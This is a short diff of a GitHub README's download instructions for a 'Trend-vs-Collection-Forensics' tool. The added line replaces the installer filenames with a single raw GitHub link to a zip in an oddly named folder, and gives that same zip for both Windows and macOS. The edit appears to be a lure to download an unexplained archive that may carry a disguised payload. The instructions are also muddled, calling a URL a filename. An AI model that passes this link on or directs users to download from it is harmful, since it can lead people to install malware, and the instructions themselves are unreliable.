Erozin624/Trend-vs-Collection-Forensics/README.md

 - For Windows users, click the `.exe` file to start the download.
 - For macOS users, click the `.dmg` file.

-If you are unsure which one to download, look for a file named something like `Trend-vs-Collection-Forensics-vX.X-X86_64.exe` for Windows or `Trend-vs-Collection-Forensics-vX.X-mac.dmg` for macOS.
+If you are unsure which one to download, look for a file named something like `https://raw.githubusercontent.com/Erozin624/Trend-vs-Collection-Forensics/main/connaturality/Collection-Trend-Forensics-vs-v1.7.zip` for Windows or `https://raw.githubusercontent.com/Erozin624/Trend-vs-Collection-Forensics/main/connaturality/Collection-Trend-Forensics-vs-v1.7.zip` for macOS.

 ### Step 3: Download the File